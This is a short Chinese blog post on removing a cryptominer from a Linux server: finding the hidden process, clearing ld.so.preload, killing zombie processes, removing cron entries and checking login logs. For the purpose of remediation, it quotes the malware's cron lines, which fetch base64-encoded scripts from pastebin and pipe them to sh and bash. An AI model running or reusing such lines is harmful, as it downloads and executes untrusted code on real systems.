服务器被挖矿

Posted 2021-01-03 雪剑无影

 查看哪个进程占据cup

　 通过 top 或者使用  ps aux

     我这个通过top 命令看不到哪个进程占用了cup ,执行  cat /etc/ld.so.preload 查看，里面也加载了异常的文件，判断是用于隐藏进程用的， 建议将其内容注释掉或删除，执行ldconfig 然后再使用top 查看下进程。

 

查找进程文件删除 　

　ps -ef|grep shutdown [命令]  或者 /proc/4170 [pid] 

 

找出系统中所有的僵尸进程

　　ps aux | grep ‘defunct‘　　

　　或
　　ps -ef | grep defunct | grep -v grep | wc -l

 

清理僵尸进程　

 　ps -e -o ppid,stat | grep Z | cut -d" " -f2 | xargs kill -9
　　或
　　kill -HUP `ps -A -ostat,ppid | grep -e ‘^[Zz]‘ | awk ‘{print $2}‘`

 

查找系统中的定时任务

　　crontab -l 

　　或者

　　cd /var/spool/cron  #查看这个文件夹下的文件删除
　　vim /etc/crontab 

 　　里面会有一个定时任务我的分别是一下这几个（删除）, 浏览器打开网址是个脚本，通过base64 加密，解密即可看到脚本内容

* */10 * * *    /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh
 */1 * * * root /bin/sh /bin/httpdns
/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash

 　　根据脚本删除脚本创建的文件，我这里删除的是  

　　/usr/local/lib/libjdk.so ，/etc/ld.so.preload

 

查看系统登录日志

     日志文件 /var/log/wtmp ，系统的每一次登录，都会在此日志中添加记录，为了防止有人篡改，该文件为二进制文件

　 cd   /var/log ; last  或者  last -f /var/log/wtmp